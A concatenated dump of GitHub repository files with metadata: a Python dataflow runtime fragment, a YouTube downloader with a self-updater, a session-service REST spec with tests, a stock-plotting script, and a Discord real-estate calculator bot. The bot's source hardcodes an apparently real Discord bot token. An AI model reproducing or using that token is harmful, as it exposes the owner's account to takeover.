\n\t\t\tself.inbox.put(token)\n\n\t##\n\t# Add a token to all the\n\t# other cores.\n\t##\n\tdef addToAll(self, token): \n\t\tfor core in self.cores:\n\t\t\tcore.put(token)\n\n\t## \n\t# Find the core under the lowest load. \n\n\t##\n\tdef getCore(self):\n\t\ttry:\n\t\t\tidx, _ = min([tup for tup in enumerate(self.cores)], key = lambda (idx, q): q.qsize())\n\t\t\treturn idx\n\t\texcept NotImplementedError:\n\t\t\treturn random.randint(0, len(self.cores) - 1)\n\n\t##\n\t# Add a reference to the message\n\t# queues of the other cores.\n\t##\n\tdef link(self, cores):\n\t\tself.maxIdx = len(cores) - 1\n\t\tself.cores = cores\n\n\t## \n\t# Start the runtime\n\t##\n\tdef start(self):\n\t\tlog.info(\"Core %s starting run loop\", self)\n\t\twhile self.active:\n\t\t\tt = self.inbox.get()\n\t\t\tself.dispatcher.process(t)\n\n\t##\n\t# Stop the current core.\n\t##\n\tdef stop(self):\n\t\tlog.info(\"Core %s terminated\", self)\n\t\tself.active = False\n\n\t##\n\t# Return a value to the user.\n\t#\n\t# \\param value\n\t#\t\tThe value to return\n\t#\t\tto the user.\n\t##\n\tdef returnValue(self, value):\n\t\tprint value\n\n__cores__ = []\n__port__ = 0\n__triv__ = None\n__in__ = None\n\ndef start(cores):\n\tif __triv__:\n\t\tlog.info(\"Aborting and returning trivial data...\")\n\t\tprint __triv__\n\t\treturn\n\n\tcoreLst = [Core(i, memory.memory()) for i in xrange(0, cores)]\n\tqueues = [coreLst[i].inbox for i in xrange(0, cores)]\n\n\tfor core in coreLst:\n\t\tcore.link(queues)\n\n\t\tp = multiprocessing.Process(\n\t\t\ttarget = core.start, \n\t\t\tname = \"C \" + str(core.identifier))\n\t\tp.start()\n\t\n\tglobal __cores__\n\t__cores__ = coreLst\n\ndef addData(datum): \n\tglobal __port__\n\ttag = token.ExternalTag(__port__)\n\ttok = token.Token(datum, tag)\n\t__cores__[0].add(tok)\n\t__port__ += 1\n\tlog.info(\"Adding data to runtime: %s\", tok)\n\ndef addTrivial(datum):\n\tglobal __triv__\n\t__triv__ = datum\n\tlog.info(\"Added trivial data to runtime\")" } ]
45
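The `run` helper in `backEnd/DVM/dvm.py` above shells out to the `dvm` binary, piping the DIS text to its stdin and passing each input value with a repeated `-i` flag. A minimal sketch of driving it from Python — assuming `dvm` is on the PATH, that this runs inside the DISc tree so the module is importable, and that `program.dis` is a placeholder for output produced earlier by DISc:

```python
# Sketch only: program.dis and the input values are hypothetical.
from backEnd.DVM import dvm

with open("program.dis") as f:
    dis_text = f.read()

# run() builds "dvm - -c <cores> -ll <logLevel> -i <x> ...", writes the
# DIS text to dvm's stdin, and returns dvm's stripped stdout.
result = dvm.run(inputs=[1, 2, 3, 4], dis=dis_text, cores=4)
print(result)
```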
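The DIS statement grammar documented in `read.py` can also be exercised by hand; `TRIV` is the simplest statement it accepts. A sketch assuming it runs from the DVM source directory, and — as `read.py`'s own calls imply — that the `core` package forwards `addTrivial` through to the runtime:

```python
# parseLine treats everything after '$' as a comment, so the note
# below is stripped before the statement is split into tokens.
import read
from core import runtime

read.parse("TRIV <= 42  $ trivial result: runtime prints it and exits")
runtime.start(1)  # sees the trivial datum, prints 42, spawns no cores
```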
elaa0505/PyTubeDown
https://github.com/elaa0505/PyTubeDown
361aa44652a85f31b7c01c780526883780cde551
8575482b80d41c03144295c27963bcbdcae3be76
782e16ad60acb0aa01ee1906d64f0a9da964077c
refs/heads/master
2020-05-31T08:14:39.664765
2019-06-04T10:29:02
2019-06-04T10:29:02
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6763990521430969, "alphanum_fraction": 0.6885644793510437, "avg_line_length": 22.711538314819336, "blob_id": "d2587035bd8a5e60acf27b4aaaae251fd9a39aea", "content_id": "e1488c7cb7cc26bd06cd2493ea2ba598c6c5fb83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 107, "num_lines": 52, "path": "/readme.md", "repo_name": "elaa0505/PyTubeDown", "src_encoding": "UTF-8", "text": "<h1 align=\"center\">\n\t<br>\n\t<img src=\"https://raw.githubusercontent.com/ProHackTech/PyTubeDown/master/logo.png\" alt=\"PyTubeDown Logo\">\n\t<br>\n\tPyTubeDown\n</h1>\n\n<h3 align=\"center\">\n\tDownload YouTube videos & playlists using Python\n</h3>\n\n## Features\n- [+] Multithreaded downloads\n- [+] Download playlist\n- [+] Download using video URL\n- [+] Download using one keyword\n- [+] Download using multiple keywords\n\n## Requirements\n\n### System\n- Tested on Windows\n- Python 3\n- Selenium - Firefox gecko driver\n\n## Usage\n\n### Help Menu\n`python3 down.py -h` or `python3 down.py --help`\n\n### Commands\n\n- **-t/--topic** = Download videos using query/topic\n- **-scrl/--scroll** = Page scroll height for loading more videos\n- **-upd/--update** = Update the script\n- **-pl/--playlist** = Download playlist\n- **-l/--link** = Download single video\n\n### Examples\n\n**Single video download**: `down.py -l \"Video Url Here\"`\n\n**One Query/Word**: `down.py -t singleWord -scrl 2000`\n\n**Multiple Search Query/Words**: `down.py -t \"Multiple Words Here\" -scrl 2000`\n\n**Playlist Download**: `down.py -pl \"Playlist Link Here\"`\n\n**Update script**: `down.py -upd`\n\n## Contributions\nAny code improvements, suggestions, issues and feature improvements are appreciated!\n" }, { "alpha_fraction": 0.7163323760032654, "alphanum_fraction": 0.719197690486908, "avg_line_length": 22.299999237060547, "blob_id": "d19cc69c30f98b14dbfb1c3332111cffdefe2811", "content_id": "aef9955f8497c246a17570209b7d3027091ad00a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 698, "license_type": "no_license", "max_line_length": 112, "num_lines": 30, "path": "/updater/update.py", "repo_name": "elaa0505/PyTubeDown", "src_encoding": "UTF-8", "text": "import urllib.request,os\nfrom sys import exit\nfrom shutil import copyfile\n\n# update directories\ndef update_dir(src):\n\tdst = \"../\" + src\n\tcopyfile(src, dst)\n\tos.remove(src)\n\tprint(f\"updated {src}\")\n\n# download files\ndef download_file(url,name):\n\ttry:\n\t\turllib.request.urlretrieve(url, name)\n\texcept:\n\t\tprint(f\"Error downloading: {url}\")\n\tupdate_dir(name)\n\n# get the file list\ntry:\n\turllib.request.urlretrieve(\"https://raw.githubusercontent.com/ProHackTech/pytubedown/master/updater/files.txt\")\nexcept:\n\tprint(f\"Error downloading: {url}\")\n\n# read file list\nlines = open('files.txt').readlines()\nlineArray = [line.strip().split(' || ') for line in lines]\nfor x in lineArray:\n\tdownload_file(x[0], x[1])" }, { "alpha_fraction": 0.6260162591934204, "alphanum_fraction": 0.6260162591934204, "avg_line_length": 40.16666793823242, "blob_id": "c47f841e40e321bfa7ceae232e8440b8d5177882", "content_id": "61dd28df886ed687e73b888bea590938e5405da5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 70, "num_lines": 6, "path": "/support/errors.py", "repo_name": 
"elaa0505/PyTubeDown", "src_encoding": "UTF-8", "text": "from support.colors import c_white, c_green, c_red, c_yellow, c_blue\n\nerror = f'{c_blue}[ERROR] {c_red}'\nwarning = f'{c_blue}[!] {c_yellow}'\nsuccess = f'{c_blue}[+] {c_green}'\nprint_help = f'\\n{c_white}Type: -h/--help for help [Ex: script.py -h]'" }, { "alpha_fraction": 0.6783528923988342, "alphanum_fraction": 0.680647611618042, "avg_line_length": 32.96104049682617, "blob_id": "051c8b9ee9bb906ae900d7a76132abf95743d638", "content_id": "7422230a449c9285a0573c9dbcc4229763704813", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7844, "license_type": "no_license", "max_line_length": 170, "num_lines": 231, "path": "/down.py", "repo_name": "elaa0505/PyTubeDown", "src_encoding": "UTF-8", "text": "import threading\nimport argparse\nimport requests\nimport urllib\nimport httplib2\nimport sys\nfrom support.colors import c_white, c_green, c_red, c_yellow, c_blue\nfrom support.errors import error, warning, success, print_help\nfrom time import sleep\nfrom tqdm import tqdm\nfrom pytube import YouTube\nfrom selenium import webdriver\n\n# replace quotes in string\ndef remove_quotes(_string_):\n\t_string_=_string_.replace('\"', '')\n\treturn _string_\n\n# replce blank space in string\ndef replace_blank_space(_string_):\n\t_string_=_string_.replace(' ', '+')\n\treturn _string_\n\n# download vidos\nnot_downloaded = []\ndef download_video(video):\n\tif video == \"https://www.youtube.com/None\":\n\t\tprint(f\"{warning}Video 'None' type! Exiting..\")\n\t\texit()\n\telse:\n\t\ttry:\n\t\t\tYouTube(video).streams.first().download()\n\t\t\tprint(f\"{success} Downloaded: {c_yellow}{video}{c_white}\")\n\t\texcept:\n\t\t\t# try again after timeout\n\t\t\tsleep(3)\n\t\t\ttry:\n\t\t\t\tdownload_video(video)\n\t\t\texcept:\n\t\t\t\tprint(f\"{error}[-] {video}{c_white}\")\n\t\t\t\tnot_downloaded.append(video)\n\n# thread creator \\(~_~)/\ndef thread_ripper(video_links):\n\trippers = [threading.Thread(target=download_video, args=(video,)) for video in video_links] # create list of threads with target to download videos\n\tpbar = tqdm(total=len(rippers)) # initiate progressbar\n\tfor ripper in rippers: # for each thread in list of threads\n\t\tripper.start() # start thread\n\tfor ripper in rippers:\n\t\tripper.join() # add thread to thread pool\n\t\tpbar.update(1) # update progress bar\n\n\tsleep(2)\n\n\t# try again for not downloaded: multi-theading again\n\trippers = [threading.Thread(target=download_video, args=(video,)) for video in not_downloaded] # create list of threads with target to download videos\n\tpbar = tqdm(total=len(rippers)) # initiate progressbar\n\tfor ripper in rippers: # for each thread in list of threads\n\t\tripper.start() # start thread\n\tfor ripper in rippers:\n\t\tripper.join() # add thread to thread pool\n\t\tpbar.update(1) # update progress bar\n\n\t# if not_downloaded is not empty\n\tif len(not_downloaded) > 0:\n\t\t# print error message\n\t\tprint(f\"{error}Unable to download following videos:\")\n\t\t# for each in not_downloaded,\n\t\tfor v in not_downloaded:\n\t\t\t# print url\n\t\t\tprint(f\"{c_yellow}{v}{c_white}\")\n\t\t# reattempt the download\n\t\tprint(\"Reattempting.. 
in single thread mode\")\n\t\tfor v in not_downloaded:\n\t\t\t# download one at a time, then next\n\t\t\tdownload_video(v)\n\n# generate video links\ndef get_vids(topic, scrl):\n\tvideo_links = [] # store video links in list\n\ttopic = remove_quotes(topic) # remove quotes from topic\n\ttopic = replace_blank_space(topic) # replace blank\n\tsite = f\"https://www.youtube.com/results?search_query={topic}\" # form the url\n\tdriver = webdriver.Firefox() # start webdriver\n\tdriver.get(site) # open the url\n\texec_string = f\"window.scrollTo(0, {scrl})\" # make page scroll javascript with what user specified\n\tsleep(3) # delay 3 seconds\n\tdriver.execute_script(exec_string) # execute the javascript on url page\n\tsleep(5) # delay 5 seconds\n\n\t# find video elements\n\tvideo_titles = driver.find_elements_by_id(\"video-title\")\n\n\t# save links\n\tfor video_title in video_titles:\n\t\t# get the attributes using selenium\n\t\tlnk = video_title.get_attribute('href')\n\t\t# concatenation\n\t\tformed_link = f\"https://www.youtube.com/{lnk}\"\n\t\t# append formed url to video_links\n\t\tvideo_links.append(formed_link)\n\tdriver.quit()\n\n\t# download videos with multiple threads\n\tthread_ripper(video_links)\n\ndef get_playlist(url):\n\t# remove quoted from the link\n\turl = remove_quotes(url)\n\tplaylist = \"https://www.youtube.com/playlist?list=\"\n\n\t# if the playlist is in watch mode\n\t# because it's harder to scroll inside that tiny sidenav in YouTube\n\tif \"/watch?v=\" in url:\n\t\tlist_link = url.split(\"&\")[1][5:] # get list unique url\n\t\tplaylist += list_link # update variable\n\telse:\n\t\t# make playlist same as url\n\t\tplaylist = url\n\n\t# get videos link in playlist\n\tvideo_links = []\n\t# define webdriver\n\tdriver = webdriver.Firefox()\n\t# get the playlist using selenium\n\tdriver.get(playlist)\n\tsleep(5) # seconds\n\t# find elements with class name\n\tlink_elems = driver.find_elements_by_class_name(\"ytd-playlist-video-renderer\")\n\tprint(\"Gathering videos from playlist..\")\n\t# for each item in link_elems\n\tfor link_elem in link_elems:\n\t\t# get the link from href attribute\n\t\twatch_link = link_elem.get_attribute('href')\n\t\tvideo_links.append(watch_link) # add new item to the list of video links\n\tdriver.quit() # quit the driver\n\t# clean video_links of: None\n\tprint(\"Cleaning video list\")\n\tclean_list = [x for x in video_links if x is not None] # remove the 'None' types from list\n\twatch_list = [] # define new list\n\tfor item in clean_list: # for each item in clean list\n\t\titemArray = item.split(\"&\") # split the item using '&' character\n\t\twatch_list.append(itemArray[0]) # get the first part and add to watch_list\n\tprint(f\"Total Videos: {len(watch_list)}\") # get the number of items and print\n\tthread_ripper(watch_list) # start the thread ripper on array\n\n# get get individual links\ndef get_link(url):\n\turl = remove_quotes(url)\n\tdownload_video(url)\n\n# reading git version of script\ndef read_git_version():\n\t# read version file from github\n\threq = httplib2.Http()\n\tresponse_header,content=hreq.request(\"https://raw.githubusercontent.com/ProHackTech/pytubedown/master/version.me\",\"GET\")\n\tcontent = content.decode()\n\tcontent = int(content)\n\treturn content\n\n# reading local version file\ndef read_my_version():\n\tversion_me = 0\n\t# read current version\n\twith open(\"version.me\", \"r\") as fversion:\n\t\tfor line in fversion:\n\t\t\tversion_me = line\n\tversion_me = int(version_me)\n\treturn version_me\n\n# check for 
updates\ndef update_me():\n\tversion_me, content = read_my_version(), read_git_version()\n\t# compare versions\n\tif version_me < content:\n\t\tprint(f\"{success} There is a new version available!\\nRun /updater/update.py for updating..\")\n\telse:\n\t\tprint(f\"{c_blue}Already Updated!{c_white}\")\n\ndef networkIsUp():\n\ttry:\n\t\trequests.get(\"https://duckduckgo.com/\")\n\t\treturn True\n\texcept:\n\t\tprint(f\"{error}Your internet is not working!{c_white}\")\n\t\treturn False\n\nparser = argparse.ArgumentParser(description=\"pytubedown: YouTube video downloader in Python\")\nparser.add_argument(\"-t\", \"--topic\", help=\"Enter topic name\", type=str)\nparser.add_argument(\"-scrl\", \"--scroll\", help=\"Enter max scroll\", type=int)\nparser.add_argument(\"-upd\", \"--update\", help=\"Update pytubedown\", action=\"store_true\")\nparser.add_argument(\"-pl\", \"--playlist\", help=\"Download Playlist\", type=str)\nparser.add_argument(\"-l\", \"--link\", help=\"Single link download\", type=str)\nargs = parser.parse_args()\n\n# ascii art\nprint('''\n ____ ___ _ _____ _ ____ _____ ____ ____ _ _ \n/ __\\\\ \\\\///__ __\\\\/ \\\\ /\\\\/ _ \\\\/ __// _ \\\\/ _ \\\\/ \\\\ /|/ \\\\ /|\n| \\\\/| \\\\ / / \\\\ | | ||| | //| \\\\ | | \\\\|| / \\\\|| | ||| |\\\\ ||\n| __/ / / | | | \\\\_/|| |_\\\\| /_ | |_/|| \\\\_/|| |/\\\\||| | \\\\||\n\\\\_/ /_/ \\\\_/ \\\\____/\\\\____/\\\\____\\\\____/\\\\____/\\\\_/ \\\\|\\\\_/ \\\\|\n \n\t''')\n\nif networkIsUp() == True:\n\t# read version\n\tmy_version = read_my_version()\n\tprint(f\"\\n{c_green} Version: {c_white} {my_version}\\n\")\n\t# update the updater that updates this which we are updating here :v\n\ttry:\n\t\turllib.request.urlretrieve(\"https://raw.githubusercontent.com/ProHackTech/pytubedown/master/updater/update.py\", \"updater/update.py\")\n\texcept:\n\t\tprint(f\"{error}Unable to retreieve updater!{c_white}\\n You can manually download it from:{c_yellow} github.com/ProHackTech/pytubedown/tree/master/updater{c_white}\\n\\n\")\n\t\n\t# download via topic\n\tif args.topic:\n\t\tif args.scroll:\n\t\t\tget_vids(args.topic, args.scroll)\n\t\telse:\n\t\t\tget_vids(args.topic, 0)\n\t# update script\n\telif args.update:\n\t\tupdate_me()\n\t# playlist download\n\telif args.playlist:\n\t\tget_playlist(args.playlist)\n\telif args.link:\n\t\tget_link(args.link)\n\telse:\n\t\tprint(f\"{error}Please specify something{print_help}\")" } ]
4
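`thread_ripper` in `down.py` above spawns one thread per video, which gets heavy for large result sets. A bounded-pool alternative sketch — not part of PyTubeDown, and it assumes a `download_video` that raises on failure instead of appending to the global `not_downloaded` list:

```python
from concurrent.futures import ThreadPoolExecutor, as_completed
from tqdm import tqdm

def download_all(video_links, max_workers=8):
    # Run at most max_workers downloads at once; download_video is
    # assumed to come from down.py (modified to raise on failure).
    failed = []
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = {pool.submit(download_video, url): url for url in video_links}
        for future in tqdm(as_completed(futures), total=len(futures)):
            if future.exception() is not None:
                failed.append(futures[future])  # collect for a retry pass
    return failed
```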
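For reference, `updater/update.py` above expects each `files.txt` line to carry a raw URL and a local file name separated by `' || '`. A sketch of the parsing it performs; the entry shown is made up, not a real line from the repository:

```python
# Hypothetical files.txt entry; update.py splits each stripped line on
# ' || ' and passes the pieces to download_file(url, name).
line = "https://example.com/raw/down.py || down.py\n"
url, name = line.strip().split(' || ')
assert (url, name) == ("https://example.com/raw/down.py", "down.py")
```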
cbednarski/session-spec
https://github.com/cbednarski/session-spec
0a783aacd18ab8d2d0bc2ae2524187c8143b6d67
f8e9a92cd7759ee2105b4e8415d6516c2b973bed
dd5b2717d51cc1ef25dedb6781e990e5325bc91a
refs/heads/master
2019-04-18T23:38:49.424034
2013-11-13T08:39:46
2013-11-13T08:39:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.701127827167511, "alphanum_fraction": 0.7203007340431213, "avg_line_length": 60.86046600341797, "blob_id": "519cc6056af9c1e6665202351242dd1d7b5bd5c6", "content_id": "35649dcdd1e31f3a457455a0e297d5f3e2d276cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2662, "license_type": "no_license", "max_line_length": 231, "num_lines": 43, "path": "/README.md", "repo_name": "cbednarski/session-spec", "src_encoding": "UTF-8", "text": "# Session Service Specification\n\nThis repo is a set of functional tests written in python that describe the REST interface for a session service. The initial implementation is based on the API for [seshun](https://github.com/avayanis/seshun).\n\n### Terminology\n\n - **client app:** an application that stores some data in seshun\n - **session:** a blob of user data that’s stored in seshun by a client app\n - **bucket:** a way for client apps to segment their data apart from other client apps. Not a reference to any particular implementation that uses \"bucket\" terminology.\n - **id:** a Universally Unique Identifier (UUID)\n - **API key:** authentication mechanism to prevent tampering of data by unauthorized / anonymous clients.\n\n### Basic Rest-y Interface\n\nA session is accessed via standard HTTP / REST verbs.\n\n| Action | URI | Description | Response |\n|--------|-----|-------------|----------|\n| Any | All | Any method + URL mismatches will respond with a 405 Method Not Allowed | 405 Method Not Allowed |\n| Any | All | Any request made without a valid API key will respond with a 401 Not Authorized | 401 Not Authorized |\n| PUT | /session/bucket | Create a new session | 201 Created on success |\n| GET | /session/bucket/id | Retrieve session data corresponding to the specified id, extend TTL | 200 Success; 404 Not Found if `id` is missing |\n| POST | /session/bucket/id | Update session data that corresponds to the specified id, extend TTL | 200 Success; 404 Not found if `id` is missing |\n| DELETE | /session/bucket/id | Delete a session that corresponds to the specified id | 200 OK on success; 404 Not Found if `id` is missing / already deleted |\n\n### API Keys\n\nAPI keys are sent via a header (X-API-KEY).\n\nIf the API key is not valid, the client will receive a 401 Not Authorized header.\n\n### API Key API\n\nOne or more master API key are configured in the seshun config file. Changing these requires a server restart. Requests made to the /api-key/ endpoint using these API keys can be used to make new bucket + API key pairs for clients.\n\n| Action | URI | Description | Response |\n|--------|-----|-------------|----------|\n| PUT | /api-key/bucket | Responds with new API key | 201 Created on success; 409 Conflict on duplicate bucket name |\n| POST | /api-key/bucket | invalid | 405 Method Not Allowed |\n| GET | /api-key/bucket | Responds with the current API key | 200 OK on success |\n| DELETE | /api-key/bucket | used to delete an API key | 200 OK on success\n\nA key regeneration operation is handled via DELETE and PUT. 
This emphasizes the destructive / service-interruptive nature of the change, and leaves key generation methods to the server.\n" }, { "alpha_fraction": 0.7575757503509521, "alphanum_fraction": 0.7575757503509521, "avg_line_length": 19, "blob_id": "4a858decb0b6ea8cece2016b4b4fa6aeca7e7f68", "content_id": "e92cf881d14c199e634f1aabef9652256970806e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 99, "license_type": "no_license", "max_line_length": 39, "num_lines": 5, "path": "/Makefile", "repo_name": "cbednarski/session-spec", "src_encoding": "UTF-8", "text": "all: init test\ninit:\n\tpip install -r requirements.txt\ntest:\n\tpy.test --verbose test_session_spec.py" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 14, "blob_id": "a3ee4f35227c435d0c5b7ef895c3959b01ea2572", "content_id": "39c20ccae83534bf5a9f5764dbe1a89fb57f4e1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 30, "license_type": "no_license", "max_line_length": 15, "num_lines": 2, "path": "/requirements.txt", "repo_name": "cbednarski/session-spec", "src_encoding": "UTF-8", "text": "requests==2.0.1\npytest==2.4.2\n" }, { "alpha_fraction": 0.5945945978164673, "alphanum_fraction": 0.6268951892852783, "avg_line_length": 32.71111297607422, "blob_id": "ec86b88288b21b6bdf04bfe7b071e3518321103b", "content_id": "47937f82cf130b85898dfecb48d54ebf683bf2ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1517, "license_type": "no_license", "max_line_length": 139, "num_lines": 45, "path": "/test_session_spec.py", "repo_name": "cbednarski/session-spec", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport re\n\nimport requests\n\n# Configs\nbase_url = 'http://127.0.0.1:8385'\nadmin_url = 'http://127.0.0.1:8386'\nbucket_name = 'myapp'\nadmin_key = 'this_should_be_something_secret'\n\n\nclass State(object):\n api_key = None\n\n\ndef test_create_key():\n r = requests.put(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert 201 == r.status_code\n\ndef test_duplicate_key():\n r = requests.put(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert(409 == r.status_code)\n\ndef test_get_key():\n r = requests.get(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert('api_key' in r.json())\n assert re.match('^[a-z0-9]{8}(-[a-z0-9]{4}){3}-[a-z0-9]{12}$', r.json()['api_key']) is not None, 'Verify the API key looks like a UUID'\n State.api_key = r.json()['api_key']\n assert('bucket' in r.json())\n assert(r.json()['bucket'] == bucket_name)\n assert(200 == r.status_code)\n\ndef test_get_key_again():\n r = requests.get(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert(State.api_key == r.json()['api_key'])\n\ndef test_405_on_post():\n r = requests.post(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert(405 == r.status_code)\n\n\ndef test_delete_key():\n r = requests.delete(admin_url + '/api-key/' + bucket_name, headers={'X-ADMIN-API-KEY': admin_key})\n assert(200 == r.status_code)\n" } ]
4
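The session-spec README above pins down the /session/ endpoints only as a table, and the repo's test file exercises just the /api-key/ side. Below is a minimal client sketch for the session endpoints, assuming the base_url from the test config, a hypothetical bucket and API key, and a guessed response shape for the returned session id (the spec does not fix it):

    import requests

    base_url = 'http://127.0.0.1:8385'
    headers = {'X-API-KEY': 'example-key'}  # hypothetical key obtained via PUT /api-key/myapp

    # PUT /session/bucket -> 201 Created for a new session
    r = requests.put(base_url + '/session/myapp', json={'user': 'alice'}, headers=headers)
    assert r.status_code == 201
    session_id = r.json()['id']  # assumed response shape

    # GET returns the stored blob and extends the TTL
    r = requests.get(base_url + '/session/myapp/' + session_id, headers=headers)
    assert r.status_code == 200

    # DELETE succeeds once, then the id is gone
    assert requests.delete(base_url + '/session/myapp/' + session_id, headers=headers).status_code == 200
    assert requests.delete(base_url + '/session/myapp/' + session_id, headers=headers).status_code == 404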
eprst/trading-helper
https://github.com/eprst/trading-helper
1705a513c54de9747cf7608ef8078b480b733fe5
262498ba83c05760639d89e761bd467806ab0ca8
d5db88f54f105bbf19c61cc3d2161e091df16df0
refs/heads/main
2023-02-08T23:33:42.776841
2020-12-29T08:40:29
2020-12-29T08:40:29
325,209,526
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7128027677536011, "alphanum_fraction": 0.7240484356880188, "avg_line_length": 29.421052932739258, "blob_id": "108b92d257eb00840dd4b21e567421f519a3bcee", "content_id": "0ebb19fb8b69f3cd7a281efc8fa3082cc3493f35", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1156, "license_type": "permissive", "max_line_length": 92, "num_lines": 38, "path": "/th.py", "repo_name": "eprst/trading-helper", "src_encoding": "UTF-8", "text": "from datetime import datetime, timedelta\n\nimport matplotlib.pyplot as plt\nfrom alpha_vantage.techindicators import TechIndicators\nfrom alpha_vantage.timeseries import TimeSeries\nfrom matplotlib.pyplot import figure\n\ndays = 30\n\nend_date = datetime.today()\nstart_date = end_date - timedelta(days=days)\n\n\ndef filter_frame(frame):\n result = frame[(frame.index > start_date) & (frame.index <= end_date)]\n result = result.sort_index(ascending=True)\n return result\n\n\nwith open('alphavantage_api_key') as keyfile:\n api_key = keyfile.readline().strip()\n\nts = TimeSeries(api_key, output_format='pandas')\nti = TechIndicators(api_key, output_format='pandas')\n\naapl_data, aapl_meta_data = ts.get_intraday(symbol='aapl', outputsize='full')\naapl_bands, aapl_meta_bands = ti.get_bbands(symbol='aapl', interval='daily', time_period=20)\npton_rsi, q = ti.get_rsi(symbol='aapl', interval='daily', time_period=14)\n\nfigure(num=None, figsize=(15, 6), dpi=80, facecolor='w', edgecolor='k')\n# aapl_bands.plot()\n# pton_rsi.plot()\n# aapl_data['4. close'].plot()\nfilter_frame(aapl_data)['5. adjusted closed'].plot()\n\nplt.tight_layout()\nplt.grid()\nplt.savefig('graph.png')\n" }, { "alpha_fraction": 0.4680851101875305, "alphanum_fraction": 0.6869301199913025, "avg_line_length": 15.449999809265137, "blob_id": "08554cf01d26afc55c7ad6a18e5701320596889e", "content_id": "ecfbf1547466ddcbcd1960e4a3bc4c71c8bd43d6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 329, "license_type": "permissive", "max_line_length": 26, "num_lines": 20, "path": "/requirements.txt", "repo_name": "eprst/trading-helper", "src_encoding": "UTF-8", "text": "aiohttp==3.7.3\nalpha-vantage==2.3.1\nasync-timeout==3.0.1\nattrs==20.3.0\ncertifi==2020.12.5\nchardet==3.0.4\nDateTime==4.3\nidna==2.10\nlxml==4.6.2\nmultidict==5.1.0\nnumpy==1.19.4\npandas==1.2.0\npython-dateutil==2.8.1\npytz==2020.5\nrequests==2.25.1\nsix==1.15.0\ntyping-extensions==3.7.4.3\nurllib3==1.26.2\nyarl==1.6.3\nzope.interface==5.2.0\n" } ]
2
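The mape helper in th.py above is the usual mean absolute percentage error. A standalone copy with a worked call; the numbers are invented for illustration:

    import numpy as np

    def mape(y_true, y_pred):
        # same definition as in th.py: mean(|true - pred| / true) * 100, rounded to 2 places
        y_true, y_pred = np.array(y_true), np.array(y_pred)
        return round(np.mean(np.abs((y_true - y_pred) / y_true)) * 100, 2)

    print(mape([100, 200, 400], [110, 190, 400]))  # (0.10 + 0.05 + 0.00) / 3 * 100 = 5.0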
RyanNDao/Public-RE-Bot
https://github.com/RyanNDao/Public-RE-Bot
47f596c6c799636b61a1770a4cff5ea8533ecb19
43268f75052afe610adcc4be159dbe053eada7cb
33e5306be8a4e63c49601471dcc4dd0d056afff2
refs/heads/master
2023-01-05T21:48:51.261641
2020-11-02T00:55:39
2020-11-02T00:55:39
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6551122665405273, "alphanum_fraction": 0.6756229996681213, "avg_line_length": 34.58759307861328, "blob_id": "20d4eef597cfaf85e40ccb303cc05cc19234b786", "content_id": "b9b77db4b65e7c59b9e33aa4ed5aa6835de5064c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9751, "license_type": "no_license", "max_line_length": 169, "num_lines": 274, "path": "/RealEstateCalculatorBotV1.py", "repo_name": "RyanNDao/Public-RE-Bot", "src_encoding": "UTF-8", "text": "'''Bot developed by Rye#9601'''\n\nimport asyncio\nimport discord\nfrom discord.ext import commands\n\nTOKEN = 'NzcyMjI0NDUzMDI3MTY4Mjc3.X53kEA.2xDd0-qwA5Pst-ilGnislVGC_-8'\nbot = commands.Bot(command_prefix='$')\ngame = discord.Game('with your money')\n\n\[email protected]\nasync def on_ready():\n\tprint('Logged in as:')\n\tprint(bot.user.name)\n\tprint(bot.user.id)\n\tprint('--------')\n\tawait bot.change_presence(status=discord.Status.online, activity=game)\ndef amort(mortgage, stop, worth, principal, intRate, monthly, PMI, totalPMI, count):\n\tif worth >= stop:\n\t\tPMIList = [totalPMI, round(PMI / 12, 2), count]\n\t\treturn PMIList\n\telse:\n\t\tinterest = (intRate/12)*mortgage\n\t\tprincipal = monthly - interest\n\t\tworth += principal\n\t\tmortgage -= principal\n\t\tmonthlyPMI = PMI/12\n\t\ttotalPMI += monthlyPMI\n\t\tcount += 1\n\t\treturn amort(mortgage, stop, worth, principal, intRate, monthly, PMI, totalPMI, count)\ndef check(m):\n\treturn m.content.isdigit() or m.content == 'quit'\ndef percCheck(m):\n\tif m.content == \"quit\":\n\t\treturn True\n\telse:\n\t\tif m.content[-1] == \"%\":\n\t\t\ttry:\n\t\t\t\tfloat(m.content[:-1])\n\t\t\t\treturn True\n\t\t\texcept ValueError:\n\t\t\t\treturn False\n\t\telse:\n\t\t\tif m.content.isdigit():\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tfloat(m.content)\n\t\t\t\t\treturn True\n\t\t\t\texcept ValueError:\n\t\t\t\t\treturn False\ndef case_insensitive(message):\n\treturn message.content.lower()\ndef booleanCheck(m):\n\tm.content = 